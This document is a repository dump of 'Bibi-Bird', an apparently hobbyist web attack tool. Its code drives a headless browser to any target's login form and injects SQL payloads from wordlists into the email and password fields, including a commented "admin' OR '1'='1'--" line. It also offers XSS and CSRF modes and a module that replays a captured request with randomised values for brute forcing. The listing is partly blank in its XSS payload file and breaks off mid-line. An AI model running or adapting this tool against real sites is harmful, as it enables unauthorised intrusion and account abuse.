├── modules ├── __init.__.py ├── __pycache__ │ ├── bireq.cpython-312.pyc │ ├── mods.cpython-312.pyc │ └── scans.cpython-312.pyc ├── mods.py ├── bireq.py └── scans.py ├── data ├── InputSelectors.txt ├── values.txt ├── EmailSelectors.txt ├── PassSelectors.txt └── gueses.json ├── dict ├── xss-common.txt ├── sql-common.txt ├── sql-time.txt └── sql-generic.txt ├── requirements.txt ├── tests └── request.txt ├── README.md └── main.py /modules/__init.__.py: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /data/InputSelectors.txt: -------------------------------------------------------------------------------- 1 | input -------------------------------------------------------------------------------- /data/values.txt: -------------------------------------------------------------------------------- 1 | password 2 | passwordRepeat 3 | email 4 | Email 5 | securityQuestion 6 | securityAnswer 7 | -------------------------------------------------------------------------------- /dict/xss-common.txt: -------------------------------------------------------------------------------- 1 | 2 |

3 | '\"> 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 |

Operative system	Version
MacOS	Monterey 12.6.7
Windows	11/10
Kali linux	Rolling / Sana
Parrot OS	3.1
Ubuntu	22.04/20.04
Debian	10.00
Alpine	3.10
Fedora	v33
Arch Linux	2021.07.01
Manjaro	21
Void	Rolling Release

76 | 77 | # 📖 Requirements 78 | 79 | There Is A Lot Lol 80 | 81 | - colorama 82 | - requests 83 | - selenium 84 | - alive_progress 85 | - bs4 86 | 87 | # 🗣️Supported Languages 88 | (we need translators 😭) 89 | - [x] English 90 | - [ ] Italian 91 | - [ ] Hebrew 92 | - [ ] Spanish 93 | - [ ] French 94 | - [ ] Arabic 95 | - [ ] German 96 | - [ ] Hindi 97 | - [ ] Russian 98 | - [ ] Portuguese 99 | 100 | # 📕 Upcoming Features 101 | (They Are Great First Issues :D) 102 | 103 | - [x] SQL Injections 104 | - [ ] SQL Detections 105 | - [ ] DNS Scanning 106 | - [ ] URL Brute Forcing 107 | - [ ] Reports 108 | - [X] XSS Injecting 109 | - [ ] Site OSINT 110 | - [ ] Custom Wordlists 111 | - [ ] Payload Generation 112 | - [X] Payload Selection 113 | - [X] CSRF Attacks (beta) 114 | 115 | # ⁉️ Need Help? 116 | Check out https://github.com/alfredredbird/Bibi-Bird/issues or the WiKi for help. 117 | Still Need Help? Contact Below :D 118 | 119 | # 📗 Info: 120 | 121 | 122 | 123 | 124 | 125 | 126 | 127 | 128 | 129 | 130 | 131 | 132 | 133 | 134 |

Wiki	https://github.com/alfredredbird/Bibi-Bird/wiki
Releases	https://github.com/alfredredbird/Bibi-Bird/releases
Contributors	https://github.com/alfredredbird/Bibi-Bird/graphs/contributors

135 | 136 | # 📘 Contact 137 | 138 | - Twitter: https://twitter.com/alfredredbird1 139 | - LinkedIn: https://www.linkedin.com/in/jeffrey-montanari-7178a1290/ 140 | 141 | # 🛠 Other Tools 142 | 143 | Other tools in the fleet: 144 | - Tookie-OSINT: http://github.com/alfredredbird/tookie-osint 145 | 146 | # 🤝 Partnership 147 | Want to partner with the Bibi-Bird project? Feel free to reach out! 148 | 149 | partners: 150 | 151 | ~ Mrofcodyx - [Git-eXpossed](https://github.com/mrofcodyx/Git-eXposed) 152 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import os 3 | from bs4 import BeautifulSoup 4 | import argparse 5 | from modules.scans import * 6 | from modules.mods import * 7 | from modules.bireq import * 8 | # Variables á••( á› )á•— 9 | url = "" 10 | wordlistpath = "" 11 | payload = 0 12 | delay = 3 13 | 14 | parser = argparse.ArgumentParser( 15 | prog='BiBi', 16 | description='Scans websites for vulnerabilities', 17 | epilog='Hello from Bibi') 18 | 19 | parser.add_argument('-b', '--brute', action='store_true') 20 | parser.add_argument('-u', '--url') 21 | parser.add_argument('-l', '--lengths', type=int, nargs=2, help='Minimum and maximum length for subdomain brute-forcing') 22 | parser.add_argument('-w', '--wordlist') 23 | parser.add_argument('-i', '--inject', action='store_true', help='SQL Injection Mode') 24 | parser.add_argument('-p', '--payload', type=int) 25 | parser.add_argument('-d', '--delay', type=int) 26 | parser.add_argument('-x', '--xss', type=int) 27 | parser.add_argument('-r', '--repeat', type=int) 28 | parser.add_argument('-c', '--csrf', type=str, help='Cross Site Request Forgery Mode') 29 | 30 | arg = parser.parse_args() 31 | 32 | # main functions on start up 33 | 34 | chrome_options = Options() 35 | 36 | chrome_options.add_argument("--headless") 37 | chrome_options.add_argument("--no-sandbox") 38 | chrome_options.add_argument("--disable-dev-shm-usage") 39 | chrome_options.add_argument("--disable-software-rasterizer") 40 | chrome_options.add_argument("--disable-gpu") 41 | chrome_options.add_argument( "--log-level=3") 42 | driver = webdriver.Chrome(options=chrome_options) 43 | 44 | headers = { 45 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36", 46 | "Accept-Language": "en-US,en;q=0.9", 47 | "Accept-Encoding": "gzip, deflate, br", 48 | "Connection": "keep-alive", 49 | "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", 50 | "Upgrade-Insecure-Requests": "1", 51 | "Referer": "https://www.google.com/", 52 | "DNT": "1" 53 | } 54 | 55 | if arg.url is None and arg.csrf is None: 56 | url = input("Target: ") 57 | else: 58 | url = arg.url 59 | 60 | if arg.payload: 61 | payload = arg.payload 62 | 63 | if arg.delay: 64 | delay = arg.delay 65 | if arg.xss: 66 | mode = arg.xss 67 | 68 | 69 | if arg.wordlist: 70 | if arg.wordlist is None: 71 | wordlistpath = input("Wordlist: ") 72 | else: 73 | wordlistpath = arg.wordlist 74 | 75 | try: 76 | if url is not None: 77 | response = requests.get(str(url), headers=headers) 78 | else: 79 | pass 80 | except Exception as e: 81 | print("================================================") 82 | print(f"Error: {e}") 83 | print("================================================") 84 | exit(1) 85 | 86 | logo(url,response) 87 | 88 | if response.status_code >= 400: 89 | print("Error") 90 | else: 91 | try: 92 | if arg.brute: 93 | # brute(url,driver,response) 94 | subdomain(url,driver, "dict/sec.txt") 95 | if arg.inject: 96 | inject(url,driver,response,wordlistpath,payload,delay) 97 | if arg.xss: 98 | xssScan(driver,url,mode) 99 | if arg.csrf: 100 | if arg.repeat is None: 101 | repeat_count = int(input("Enter the number of times to repeat the request: ")) # User-defined repeat count 102 | else: 103 | repeat_count = arg.repeat 104 | send_repeated_requests(arg.csrf, repeat_count, url) 105 | except KeyboardInterrupt: 106 | print("⟪ ⟫") 107 | print("⟪ Stopping... ⟫") 108 | print("⟪ ⟫") 109 | print("⟪±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±⟫") 110 | exit(1) 111 | print("⟪ ⟫") 112 | print("⟪±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±±⟫") -------------------------------------------------------------------------------- /data/gueses.json: -------------------------------------------------------------------------------- 1 | [ 2 | { 3 | "url": "http://192.168.12.146:3000/#/login", 4 | "count": 30, 5 | "date": "2024-09-10T11:29:40.863090" 6 | }, 7 | { 8 | "url": "http://192.168.12.146:3000/#/login", 9 | "count": 25, 10 | "date": "2024-09-10T11:30:11.920031" 11 | }, 12 | { 13 | "url": "http://192.168.12.146:3000/#/login", 14 | "count": 24, 15 | "date": "2024-09-10T11:30:24.070418" 16 | }, 17 | { 18 | "url": "http://192.168.12.146:8096/web/index.html#!/login.html", 19 | "count": 0, 20 | "date": "2024-09-10T11:32:52.081999" 21 | }, 22 | { 23 | "url": "http://192.168.12.146:3000/#/login", 24 | "count": 24, 25 | "date": "2024-09-10T11:48:13.560112" 26 | }, 27 | { 28 | "url": "http://192.168.12.146:3000/#/login", 29 | "count": 25, 30 | "date": "2024-09-10T11:48:24.983346" 31 | }, 32 | { 33 | "url": "http://192.168.12.146:8096/web/index.html#/login.html", 34 | "count": 78, 35 | "date": "2024-09-10T11:50:20.120825" 36 | }, 37 | { 38 | "url": "http://192.168.12.146:8096/web/index.html#/login.html", 39 | "count": 78, 40 | "date": "2024-09-10T11:51:22.552285" 41 | }, 42 | { 43 | "url": "http://192.168.12.146:3000/#/login", 44 | "count": 26, 45 | "date": "2024-09-10T13:11:51.650044" 46 | }, 47 | { 48 | "url": "http://192.168.12.146:3000/#/login", 49 | "count": 23, 50 | "date": "2024-09-10T14:46:03.670012" 51 | }, 52 | { 53 | "url": "http://192.168.12.146:3000/#/login", 54 | "count": 24, 55 | "date": "2024-09-10T14:58:18.638946" 56 | }, 57 | { 58 | "url": "http://192.168.12.185:3000/#/login", 59 | "count": 23, 60 | "date": "2025-02-25T20:02:14.165204" 61 | }, 62 | { 63 | "url": "http://192.168.12.185:3000/#/login", 64 | "count": 23, 65 | "date": "2025-02-25T20:03:29.029265" 66 | }, 67 | { 68 | "url": "http://192.168.12.185:3000/#/login", 69 | "count": 23, 70 | "date": "2025-02-25T20:03:54.183693" 71 | }, 72 | { 73 | "url": "http://192.168.12.185:3000/#/login", 74 | "count": 23, 75 | "date": "2025-02-25T20:04:28.519720" 76 | }, 77 | { 78 | "url": "http://192.168.12.185:3000/#/login", 79 | "count": 23, 80 | "date": "2025-02-25T20:05:54.878972" 81 | }, 82 | { 83 | "url": "http://192.168.12.185:3000/#/login", 84 | "count": 23, 85 | "date": "2025-02-25T20:07:37.851733" 86 | }, 87 | { 88 | "url": "http://192.168.12.185:3000/#/login", 89 | "count": 23, 90 | "date": "2025-02-25T20:12:24.121173" 91 | }, 92 | { 93 | "url": "http://192.168.12.185:3000/#/login", 94 | "count": 23, 95 | "date": "2025-02-25T20:13:21.192749" 96 | }, 97 | { 98 | "url": "http://192.168.12.185:3000/#/login", 99 | "count": 23, 100 | "date": "2025-02-25T20:13:48.370286" 101 | }, 102 | { 103 | "url": "http://192.168.12.185:3000/#/login", 104 | "count": 23, 105 | "date": "2025-02-25T20:14:22.198106" 106 | }, 107 | { 108 | "url": "http://192.168.12.185:3000/#/login", 109 | "count": 23, 110 | "date": "2025-02-25T20:20:35.489058" 111 | }, 112 | { 113 | "url": "http://192.168.12.185:3000/#/login", 114 | "count": 23, 115 | "date": "2025-02-25T20:23:34.581701" 116 | }, 117 | { 118 | "url": "http://192.168.12.185:3000/#/login", 119 | "count": 23, 120 | "date": "2025-02-25T20:25:19.191382" 121 | }, 122 | { 123 | "url": "http://192.168.12.185:3000/#/login", 124 | "count": 23, 125 | "date": "2025-02-25T20:29:53.108808" 126 | }, 127 | { 128 | "url": "http://192.168.12.185:3000/#/login", 129 | "count": 23, 130 | "date": "2025-02-25T20:34:43.370957" 131 | }, 132 | { 133 | "url": "http://192.168.12.185:3000/#/login", 134 | "count": 23, 135 | "date": "2025-02-25T20:35:05.117607" 136 | }, 137 | { 138 | "url": "http://192.168.12.185:3000/#/login", 139 | "count": 23, 140 | "date": "2025-02-25T20:37:22.520430" 141 | }, 142 | { 143 | "url": "http://192.168.12.185:3000/#/login", 144 | "count": 23, 145 | "date": "2025-02-26T13:55:03.543371" 146 | }, 147 | { 148 | "url": "http://192.168.12.185:3000/#/login", 149 | "count": 23, 150 | "date": "2025-02-26T14:05:53.928406" 151 | }, 152 | { 153 | "url": "http://192.168.12.185:3000/#/login", 154 | "count": 23, 155 | "date": "2025-02-26T14:08:07.860356" 156 | }, 157 | { 158 | "url": "http://192.168.12.185:3000/#/login", 159 | "count": 23, 160 | "date": "2025-02-26T14:08:23.315978" 161 | } 162 | ] -------------------------------------------------------------------------------- /modules/mods.py: -------------------------------------------------------------------------------- 1 | import os 2 | import platform 3 | import socket 4 | import sys 5 | from colorama import * 6 | import json 7 | import os 8 | from datetime import datetime 9 | 10 | 11 | def logo(url,response, count=0, pwd=0): 12 | 13 | os.system("cls" if os.name == "nt" else "clear") 14 | python_version = platform.python_version() 15 | code = response.status_code 16 | print(f""" 17 | ░░░▒▒▒▒▒▒▒▒▒ 18 | ░▒▓▓▓▓▓▓▓▓▒▒▒▒▒▒ 19 | ░▒▓▓▓█▓▓▒▒▓▒▓▒▓▓██▓▒ 20 | ░▒▒▓▓▓▓▓▒▒▒▒░░▒▓▓▓▓▓▓██░ 21 | ░▒▓▓▒▓▒▒▒▒▒▒▒▒░▒▓▓▓▓▓▓▓█▓▒ 22 | ░▒▒▓▒░▓▓▒▒▒▒▒▒░▒▒▓▓▓▓▓▓▓▓██▓ 23 | ░▒▓▒▒▒▒░▒▒▒▒▒▒░▒▓▓▓▓▓▓▓▓▓▓██░ 24 | ░▒░▒▒▓▒▒▒▒▓▒░░▒███▓▓▓▓▓▓▓▓▓█▓ 25 | ░▒░▒▒▓█░░░░░░░▒▓▓▓▓▓▓▓▓▓███▓▓▒ 26 | ▒░░▒▒▓█▒░░░░░░▓▓▓▓▓██████▓▓▓▓░ 27 | ░░░▒▓▓███▓▒░░▒▓███▓▓▓▓███▓▓▓▓░ 28 | ░░░░▒▓▓███████████████▓▒░ ▓█▒ 29 | ░░░▒▒▓███████████████▓░ ▓░ 30 | ░▒░░░░▒▒▓██████████▓▓▓▓░ 31 | ░▒▒▒▒▒░░▒▒▒▓▓████▓▓▒▒▓▓▒░ 32 | ░▒▒▒▓▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓░ 33 | ▒▓▒▓▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒ 34 | ░▓▓▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒░ 35 | ▒▒░▒░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░▒▒▒▒ 36 | ⟪===============================================⟫ 37 | ⟪ ⟫ 38 | ⟪ ░▒█▀▀▄░░▀░░▒█▀▀▄░░▀░░░░▒█▀▀▄░░▀░░█▀▀▄░█▀▄ ⟫ 39 | ⟪ ░▒█▀▀▄░░█▀░▒█▀▀▄░░█▀░░░▒█▀▀▄░░█▀░█▄▄▀░█░█ ⟫ 40 | ⟪ ░▒█▄▄█░▀▀▀░▒█▄▄█░▀▀▀░░░▒█▄▄█░▀▀▀░▀░▀▀░▀▀░ ⟫ 41 | ⟪ ⟫ 42 | ⟪ - By Jeffrey Montanari ⟫ 43 | ⟪ - @alfredredbird1 ⟫ 44 | ⟪ ⟫ 45 | ⟪===============================================⟫ 46 | ⟪ ⟫ 47 | ⟪ OS:{platform.system()} Machine: {platform.machine()} ⟫ 48 | ⟪ ⟫ 49 | ⟪ Hostname: {socket.gethostname()} ⟫ 50 | ⟪ ⟫ 51 | ⟪ IP: {socket.gethostbyname(socket.gethostname())} ⟫ 52 | ⟪ ⟫ 53 | ⟪ Python Version: {Fore.YELLOW + python_version + Fore.RESET} ⟫ 54 | ⟪ ⟫ 55 | ⟪===============================================⟫ 56 | ⟪ ⟫ 57 | ⟪ Target: {url} ⟫ 58 | ⟪ ⟫ """) 59 | 60 | 61 | if code >= 400: 62 | print(f"⟪ Response: {Fore.RED + str(code) + Fore.RESET} ⟫ ") 63 | if code <= 380: 64 | print(f"⟪ Response: {Fore.GREEN + str(code) + Fore.RESET} ⟫ ") 65 | 66 | print("""⟪ ⟫ """) 67 | if count >= 1: 68 | print(f"""⟪ Input Elements: {count+pwd} ⟫""") 69 | print("⟪ ⟫") 70 | print(f"""⟪ Email Elements: {count} ⟫""") 71 | print("⟪ ⟫") 72 | if pwd >= 1: 73 | print(f"""⟪ Password Elements: {pwd} ⟫ 74 | ⟪ ⟫ 75 | ⟪===============================================⟫ 76 | ⟪ ⟫ """) 77 | 78 | 79 | 80 | 81 | 82 | 83 | def save_to_json(url, count): 84 | filename = "data/gueses.json" 85 | data = { 86 | "url": url, 87 | "count": count, 88 | "date": datetime.now().isoformat() 89 | } 90 | 91 | # Check if the file exists 92 | if os.path.exists(filename): 93 | # Load existing data 94 | with open(filename, "r") as file: 95 | existing_data = json.load(file) 96 | # Append new data 97 | existing_data.append(data) 98 | else: 99 | # Create a new list with the first data entry 100 | existing_data = [data] 101 | 102 | # Write the updated data to the JSON file 103 | with open(filename, "w") as file: 104 | json.dump(existing_data, file, indent=4) 105 | 106 | 107 | def display_formatted_text(text, max_line_length=54): 108 | """ 109 | Display text neatly with ⟪ and ⟫ around each line. 110 | Lines will wrap to a new line if they exceed the max_line_length, 111 | and shorter lines will be padded with spaces to match the length. 112 | Parameters: 113 | - text: The text to format and display. 114 | - max_line_length: The maximum number of characters per line. 115 | """ 116 | # Make sure the text is not None 117 | if text is None: 118 | text = "" 119 | 120 | # Split the text into words to manage line wrapping 121 | words = text.split() 122 | current_line = "" 123 | formatted_output = [] 124 | 125 | for word in words: 126 | # Check if adding the next word exceeds the line length 127 | if len(current_line) + len(word) + 1 <= max_line_length: 128 | # Add word to the current line 129 | current_line += (word + " ") 130 | else: 131 | # Add the current line to formatted_output, trim trailing spaces, and pad 132 | formatted_output.append(f"⟪ {current_line.strip():<{max_line_length}} ⟫") 133 | # Start a new line with the current word 134 | current_line = word + " " 135 | 136 | # Add the last line if any remaining, and pad 137 | if current_line: 138 | formatted_output.append(f"⟪ {current_line.strip():<{max_line_length}} ⟫") 139 | 140 | # Print the formatted lines 141 | for line in formatted_output: 142 | print(line) 143 | 144 | 145 | # Example usage for request analysis 146 | def print_request_details(method, url, headers, body_data): 147 | """ 148 | Display request details using formatted text function. 149 | """ 150 | display_formatted_text(f"Request Method: {method}") 151 | print("⟪ ⟫") 152 | display_formatted_text(f"Request URL: {url}") 153 | 154 | if headers: 155 | display_formatted_text("Headers:") 156 | print("⟪ ⟫") 157 | for header, value in headers.items(): 158 | display_formatted_text(f"{header}: {value}") 159 | print("⟪ ⟫") 160 | if body_data: 161 | display_formatted_text("Body Data:") 162 | print("⟪ ⟫") 163 | display_formatted_text(json.dumps(body_data, indent=2)) 164 | else: 165 | display_formatted_text("No Body Data") 166 | print("⟪ ⟫") 167 | 168 | -------------------------------------------------------------------------------- /modules/bireq.py: -------------------------------------------------------------------------------- 1 | import re 2 | import json 3 | import requests 4 | import random 5 | import string 6 | from modules.mods import * 7 | ################################################################ 8 | # 9 | # THIS IS FOR TESTING 10 | # 11 | ################################################################ 12 | def load_values(file_path): 13 | """Load search keys from a text file, one key per line.""" 14 | with open(file_path, 'r') as file: 15 | return [line.strip() for line in file.readlines()] 16 | 17 | def save_value_to_file(file_path, key): 18 | """Save a key to the values file.""" 19 | with open(file_path, 'a') as file: 20 | file.write(f"{key}\n") 21 | print(f"⟪ Saved '{key}' to {file_path}.") 22 | 23 | def analyze_request_file(request_file, values_file, inturl): 24 | # Load keys to search for 25 | search_keys = load_values(values_file) 26 | 27 | with open(request_file, 'r') as file: 28 | # Read file content 29 | request_data = file.read() 30 | 31 | # Split request into headers and body (if any) 32 | try: 33 | headers_part, body_part = request_data.split('\n\n', 1) 34 | except ValueError: 35 | headers_part, body_part = request_data, None 36 | 37 | # Split the header lines 38 | header_lines = headers_part.splitlines() 39 | 40 | # Parse request line (e.g., "POST /api/Users/ HTTP/1.1") 41 | request_line = header_lines[0] 42 | method, url, http_version = request_line.split() 43 | 44 | # Ensure the URL has a scheme 45 | if not url.startswith(('http://', 'https://')): 46 | url = inturl + url # Update the host as needed 47 | 48 | # Parse headers 49 | headers = {} 50 | header_regex = re.compile(r'^(.*?):\s(.*)$') 51 | for line in header_lines[1:]: 52 | match = header_regex.match(line) 53 | if match: 54 | headers[match.group(1)] = match.group(2) 55 | 56 | # Try to parse body as JSON if content type indicates JSON 57 | body_data = None 58 | if body_part and headers.get('Content-Type') == 'application/json': 59 | try: 60 | body_data = json.loads(body_part) 61 | except json.JSONDecodeError: 62 | body_data = body_part # Fallback to raw body if not JSON 63 | # extra space to make it look good 64 | print("""⟪ ⟫ 65 | ⟪ ⟫ 66 | ⟪ ⟫ 67 | ⟪ ⟫ 68 | ⟪ ⟫ 69 | ⟪ ⟫ 70 | ⟪ ⟫ 71 | ⟪ ⟫ 72 | ⟪ ⟫""") 73 | 74 | print_request_details(method, url, headers, body_data) 75 | 76 | # Search for keys in the body data 77 | found_keys = {} 78 | if body_data and isinstance(body_data, dict): 79 | for key in search_keys: 80 | if key in body_data: 81 | found_keys[key] = body_data[key] 82 | 83 | # Print out found keys and their values 84 | if found_keys: 85 | print("⟪========================================================⟫") 86 | print("\n⟪ Found keys and values in the body: ⟫") 87 | for key, value in found_keys.items(): 88 | display_formatted_text(f"Found key: {key}, Value: {value}", 54) 89 | 90 | # Edit keys if the user chooses to do so 91 | while True: 92 | edit_key = input("\n⟪ Enter the key you want to edit or 'custom' to enter a new key (or 'exit' to stop editing): ") 93 | if edit_key in found_keys: 94 | new_value = input(f"⟪ Enter new value for '{edit_key}' (current value: {found_keys[edit_key]}): ") 95 | body_data[edit_key] = new_value 96 | print(f"⟪ Updated '{edit_key}' to: {new_value}") 97 | elif edit_key.lower() == 'custom': 98 | custom_key = input("⟪ Enter the new key you want to add or edit: ") 99 | custom_value = input(f"⟪ Enter the value for '{custom_key}': ") 100 | body_data[custom_key] = custom_value 101 | print(f"⟪ Added/Updated custom key '{custom_key}' with value: {custom_value}") 102 | 103 | # Option to save the custom key to the file 104 | save_choice = input(f"⟪ Do you want to save '{custom_key}' to {values_file}? (yes/no): ").strip().lower() 105 | if save_choice == 'yes': 106 | save_value_to_file(values_file, custom_key) 107 | elif edit_key.lower() == 'exit': 108 | print("⟪ Stopping edits.") 109 | break 110 | else: 111 | print("⟪ Key not found. No changes made.") 112 | 113 | # Print modified body 114 | print("\n⟪ Modified Body Data:", json.dumps(body_data, indent=2) if body_data else "⟪ No Body") 115 | 116 | # Return request details for sending 117 | return { 118 | "method": method, 119 | "url": url, 120 | "headers": headers, 121 | "body": body_data, 122 | "found_keys": found_keys # Include found keys for brute forcing 123 | } 124 | 125 | def random_string(length=8, char_set=string.ascii_letters + string.digits): 126 | """Generate a random string of fixed length from the specified character set.""" 127 | return ''.join(random.choice(char_set) for i in range(length)) 128 | 129 | def send_repeated_requests(request_file, repeat_count, inturl): 130 | values_file = 'data/values.txt' # Path to the file containing keys to search for 131 | """Send a modified request multiple times, with optional brute-forcing.""" 132 | request_details = analyze_request_file(request_file, values_file, inturl) 133 | 134 | if not request_details: 135 | print("⟪ No valid request details found. Exiting.") 136 | return 137 | 138 | method = request_details["method"] 139 | url = request_details["url"] 140 | headers = request_details["headers"] 141 | body_data = request_details["body"] 142 | found_keys = request_details["found_keys"] 143 | 144 | # Prompt for a key to brute force 145 | if found_keys: 146 | print("\n⟪ Keys available for brute forcing:") 147 | for idx, key in enumerate(found_keys.keys(), 1): 148 | print(f"{idx}. {key}") 149 | 150 | choice = input("\n⟪ Enter the number of the key you want to brute force or type 'custom' for a new key: ") 151 | if choice.lower() == 'custom': 152 | brute_force_key = input("⟪ Enter the custom key you want to brute force: ") 153 | save_choice = input(f"⟪ Do you want to save '{brute_force_key}' to {values_file}? (yes/no): ").strip().lower() 154 | if save_choice == 'yes': 155 | save_value_to_file(values_file, brute_force_key) 156 | else: 157 | try: 158 | brute_force_key = list(found_keys.keys())[int(choice) - 1] 159 | except (ValueError, IndexError): 160 | print("⟪ Invalid choice. Exiting.") 161 | return 162 | else: 163 | print("⟪ No keys found for brute forcing.") 164 | brute_force_key = input("⟪ Enter a custom key for brute forcing: ") 165 | save_choice = input(f"⟪ Do you want to save '{brute_force_key}' to {values_file}? (yes/no): ").strip().lower() 166 | if save_choice == 'yes': 167 | save_value_to_file(values_file, brute_force_key) 168 | 169 | # Ask the user for the type of brute force 170 | print("\n⟪ Choose the type of brute force:") 171 | print("⟪ 1. Email format (e.g., user@example.com)") 172 | print("⟪ 2. Letters only") 173 | print("⟪ 3. Numbers only") 174 | print("⟪ 4. Mix of letters and numbers") 175 | brute_force_type = input("⟪ Enter the number of the brute force type: ") 176 | 177 | email_endings = [] # Initialize email endings list 178 | 179 | for i in range(repeat_count): 180 | print(f"\n⟪ Sending request {i + 1}/{repeat_count}...") 181 | 182 | # Randomize the value for the brute-force key based on the selected type 183 | if brute_force_key and body_data and isinstance(body_data, dict): 184 | if brute_force_type == '1': 185 | # Ask for email endings 186 | if not email_endings: 187 | email_endings = input("⟪ Enter the email endings separated by commas (e.g., @parrot.com,@gmail.com): ").split(',') 188 | body_data[brute_force_key] = random_string(8) + random.choice(email_endings).strip() 189 | elif brute_force_type == '2': 190 | body_data[brute_force_key] = random_string(8, string.ascii_letters) # Letters only 191 | elif brute_force_type == '3': 192 | body_data[brute_force_key] = random_string(10, string.digits) # Numbers only 193 | elif brute_force_type == '4': 194 | body_data[brute_force_key] = random_string(8, string.ascii_letters + string.digits) # Mix 195 | else: 196 | print("⟪ Invalid brute force type. Exiting.") 197 | return 198 | 199 | try: 200 | if method.upper() == 'POST': 201 | response = requests.post(url, headers=headers, json=body_data) 202 | elif method.upper() == 'GET': 203 | response = requests.get(url, headers=headers, params=body_data) 204 | else: 205 | print("⟪ Unsupported HTTP method. Only GET and POST are supported.") 206 | continue 207 | 208 | # Print response from the server 209 | print(f"⟪ Response {i + 1} Status Code:", response.status_code) 210 | print(f"⟪ Response {i + 1} Body:", response.text) 211 | except requests.RequestException as e: 212 | print(f"⟪ Request {i + 1} failed: {e}") 213 | 214 | -------------------------------------------------------------------------------- /modules/scans.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import time 4 | from selenium import webdriver 5 | from selenium.webdriver.chrome.service import Service 6 | from selenium.webdriver.common.by import By 7 | from selenium.webdriver.chrome.options import Options 8 | from selenium.webdriver.common.keys import Keys 9 | from selenium.common.exceptions import UnexpectedAlertPresentException, NoAlertPresentException 10 | from bs4 import BeautifulSoup 11 | from modules.mods import * 12 | import requests 13 | import string 14 | import random 15 | import json 16 | from colorama import * 17 | 18 | box_width = 49 19 | 20 | # Function to create a fixed-width line bc it line wraps sometimes 21 | def create_box_line(content, width, align="left"): 22 | if align == "left": 23 | return f"⟪ {content.ljust(width - 4)} ⟫" 24 | elif align == "right": 25 | return f"⟪ {content.rjust(width - 4)} ⟫" 26 | elif align == "center": 27 | return f"⟪ {content.center(width - 4)} ⟫" 28 | 29 | def generate_random_string(length=8): 30 | # Define the characters to choose from: letters (uppercase and lowercase) and digits 31 | characters = string.ascii_letters + string.digits 32 | # Generate a random string by selecting random characters from the defined set 33 | random_string = ''.join(random.choice(characters) for _ in range(length)) 34 | return random_string 35 | 36 | def inject(url, driver, response, wordlist, payload, delay): 37 | 38 | # Initialize lists to store the actual WebElement objects 39 | email_elements = [] 40 | password_elements = [] 41 | # injection queue 42 | num = 0 43 | # Get the URL from the webdriver 44 | driver.get(url) 45 | 46 | 47 | 48 | try: 49 | # # Find elements by ID and NAME for password inputs 50 | # Open the file and read each line into a list 51 | with open("data/PassSelectors.txt", 'r') as f: 52 | selectors = [line.strip() for line in f.readlines()] 53 | 54 | # Loop through selectors and attempt to find elements 55 | # selector list is in data/PassSelectors.txt 56 | for selector in selectors: 57 | try: 58 | # Check if it's an XPATH expression 59 | if selector.startswith('//*[@'): 60 | elements = driver.find_elements(By.XPATH, selector) 61 | else: 62 | elements = driver.find_elements(By.NAME, selector) 63 | elements = driver.find_elements(By.ID, selector) 64 | 65 | if elements: 66 | password_elements.extend(elements) 67 | 68 | except Exception as e: 69 | print(f"Error finding elements for selector {selector}: {e}") 70 | # Remove duplicates by converting to a set and then back to a list 71 | password_elements = list(set(password_elements)) 72 | 73 | except Exception as e: 74 | print(f"An error occurred: {e}") 75 | 76 | try: 77 | # same as code above but for emails ^ 78 | with open("data/EmailSelectors.txt", 'r') as f: 79 | Eselectors = [line.strip() for line in f.readlines()] 80 | 81 | # Loop through selectors and attempt to find elements 82 | # selector list is in data/PassSelectors.txt 83 | for selector in Eselectors: 84 | try: 85 | # Check if it's an XPATH expression 86 | if selector.startswith('//*[@'): 87 | elements = driver.find_elements(By.XPATH, selector) 88 | else: 89 | elements = driver.find_elements(By.NAME, selector) 90 | elements = driver.find_elements(By.ID, selector) 91 | 92 | if elements: 93 | email_elements.extend(elements) 94 | 95 | except Exception as e: 96 | print(f"Error finding elements for selector {selector}: {e}") 97 | # Remove duplicates by converting to a set and then back to a list 98 | email_elements = list(set(email_elements)) 99 | except Exception as e: 100 | print(f"An error occurred: {e}") 101 | 102 | # Count the elements 103 | pwd = len(password_elements) 104 | count = len(email_elements) 105 | 106 | 107 | # Call the logo function 108 | logo(url, response, count, pwd) 109 | # reading and deciding the payloads 110 | if payload == 1 or payload == 0: 111 | if payload == 0: 112 | print(f"⟪ {Fore.RED + "Using Defualt Wordlist" + Fore.RESET} ⟫") 113 | print("⟪ ⟫") 114 | with open('dict/sql-common.txt', 'r') as file: 115 | # Read all lines and add them to a list 116 | lines = file.readlines() 117 | 118 | if payload == 2: 119 | with open('dict/sql-generic.txt', 'r') as f: 120 | lines = f.readlines() 121 | 122 | if payload == 3: 123 | with open('dict/sql-time.txt', 'r') as f: 124 | lines = f.readlines() 125 | 126 | 127 | 128 | email_credentials = [line.strip() for line in lines] 129 | 130 | # email_credentials = ["admin' OR '1'='1'--", "user@example.com"] 131 | password_credentials = ["parrot"] 132 | 133 | lenemail = len(email_credentials) 134 | if lenemail <= 2: 135 | print(f"⟪ Injections Loaded: {Fore.RED + str(lenemail) + Fore.RESET} ⟫") 136 | if lenemail >= 20 and lenemail <= 39: 137 | print(f"⟪ Injections Loaded: {Fore.YELLOW + str(lenemail) + Fore.RESET} ⟫") 138 | if lenemail >= 40: 139 | print(f"⟪ Injections Loaded: {Fore.GREEN + 